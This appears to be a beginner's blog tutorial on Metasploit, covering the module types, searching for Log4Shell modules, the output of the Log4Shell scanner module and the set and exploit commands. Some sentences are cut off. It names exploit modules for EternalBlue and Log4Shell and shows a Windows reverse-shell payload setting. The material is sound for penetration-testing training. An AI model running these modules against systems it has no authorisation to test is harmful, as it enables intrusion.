Metasploit
August 4, 2023 · 7 minute read
Overview
- 1. Exploits: Pre-written pieces of code designed to take advantage of specific vulnerabilities in target systems. Exploits leverage weaknesses to gain unauthorized access or control over the target system.
- 2. Payloads: Pieces of code that are delievered and executed on compromised systems after successful exploitation.
- 3. Encoders: Modules that transform the payload's code without changing its functionality. The main purpose is to obfuscate the payload's content, making it much more difficult for IDS and security tools to identify and block it.
- 4. Auxillary Modules: Miscellaneous tools and modules that serve various purposes beyond direct exploitation. They encompass a wide variety of functionalities such as network scanning, service enumeration, and more.
Getting Started
──(root㉿kali)-[/home/kali]
└─# msfconsole
.:okOOOkdc' 'cdkOOOko:.
.xOOOOOOOOOOOOc cOOOOOOOOOOOOx.
:OOOOOOOOOOOOOOOk, ,kOOOOOOOOOOOOOOO:
'OOOOOOOOOkkkkOOOOO: :OOOOOOOOOOOOOOOOOO'
oOOOOOOOO. .oOOOOoOOOOl. ,OOOOOOOOo
dOOOOOOOO. .cOOOOOc. ,OOOOOOOOx
lOOOOOOOO. ;d; ,OOOOOOOOl
.OOOOOOOO. .; ; ,OOOOOOOO.
cOOOOOOO. .OOc. 'oOO. ,OOOOOOOc
oOOOOOO. .OOOO. :OOOO. ,OOOOOOo
lOOOOO. .OOOO. :OOOO. ,OOOOOl
;OOOO' .OOOO. :OOOO. ;OOOO;
.dOOo .OOOOocccxOOOO. xOOd.
,kOl .OOOOOOOOOOOOO. .dOk,
:kk;.OOOOOOOOOOOOO.cOk:
;kOOOOOOOOOOOOOOOk:
,xOOOOOOOOOOOx,
.lOOOOOOOl.
,dOd,
.
=[ metasploit v6.3.27-dev ]
+ -- --=[ 2335 exploits - 1220 auxiliary - 413 post ]
+ -- --=[ 1385 payloads - 46 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit tip: You can pivot connections over sessions
started with the ssh_login modules
Metasploit Documentation: https://docs.metasploit.com/
msf6 >
search
keyword. For more information on a module, we can use the info
keyword. To use a module, we can either use the use
keyword with the module ID, or the use
keyword and tab complete the module name.
msfconsole
. EternalBlue is the codename for a critical software vulnerability in Microsoft's Server Message Block (SMB) protocol. This vulnerability has also been referred to as CVE-2017-0144. This vulnerability allowed attacks to perform remote code execution (RCE) on vulnerable systems without user interaction.
msf6 > search log4j
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/http/log4shell_header_injection 2021-12-09 excellent Yes Log4Shell HTTP Header Injection
1 auxiliary/scanner/http/log4shell_scanner 2021-12-09 normal No Log4Shell HTTP Scanner
2 exploit/linux/http/mobileiron_core_log4shell 2021-12-12 excellent Yes MobileIron Core Unauthenticated JNDI Injection RCE (via Log4Shell)
3 exploit/multi/http/ubiquiti_unifi_log4shell 2021-12-09 excellent Yes UniFi Network Application Unauthenticated JNDI Injection RCE (via Log4Shell)
Interact with a module by name or index. For example info 3, use 3 or use exploit/multi/http/ubiquiti_unifi_log4shell
msf6 >
auxillary
module, and because the name of the module is log4shell_scanner
.
info [NAME OF THE MODULE]
to ascertain more information about the module.
msf6 > info auxiliary/scanner/http/log4shell_scanner
Name: Log4Shell HTTP Scanner
Module: auxiliary/scanner/http/log4shell_scanner
License: Metasploit Framework License (BSD)
Rank: Normal
Disclosed: 2021-12-09
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
HEADERS_FILE /usr/share/metasploit-framework/data/expl no File containing headers to check
oits/CVE-2021-44228/http_headers.txt
HTTP_METHOD GET yes The HTTP method to use
LDAP_TIMEOUT 30 yes Time in seconds to wait to receive LDAP connections
LDIF_FILE no Directory LDIF file path
LEAK_PARAMS no Additional parameters to leak, separated by the ^ character (e.g., ${env:U
SER}^${env:PATH})
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/
basics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address
on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 389 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The URI to scan
THREADS 1 yes The number of concurrent threads (max one per host)
URIS_FILE /usr/share/metasploit-framework/data/expl no File containing additional URIs to check
oits/CVE-2021-44228/http_uris.txt
VHOST no HTTP server virtual host
Description:
Versions of Apache Log4j2 impacted by CVE-2021-44228 which allow JNDI features used in configuration,
log messages, and parameters, do not protect against attacker controlled LDAP and other JNDI related endpoints.
This module will scan an HTTP end point for the Log4Shell vulnerability by injecting a format message that will
trigger an LDAP connection to Metasploit. This module is a generic scanner and is only capable of identifying
instances that are vulnerable via one of the pre-determined HTTP request injection points. These points include
HTTP headers and the HTTP request path.
Known impacted software includes Apache Struts 2, VMWare VCenter, Apache James, Apache Solr, Apache Druid,
Apache JSPWiki, Apache OFBiz.
References:
https://nvd.nist.gov/vuln/detail/CVE-2021-44228
https://nvd.nist.gov/vuln/detail/CVE-2021-45046
https://attackerkb.com/topics/in9sPR2Bzt/cve-2021-44228-log4shell/rapid7-analysis
https://logging.apache.org/log4j/2.x/security.html
Also known as:
Log4Shell
LogJam
View the full module info with the info -d command.
msf6 >
set
command. The following syntax is as follows: set [OPTION NAME] [VALUE]
exploit
to start the module. In this case we didn't have to set up a payload since this is simply a scanning module, however if we did then we would use the following syntax: set payload [PATH TO PAYLOAD]
. For example: set payload windows/x64/shell_reverse_tcp
.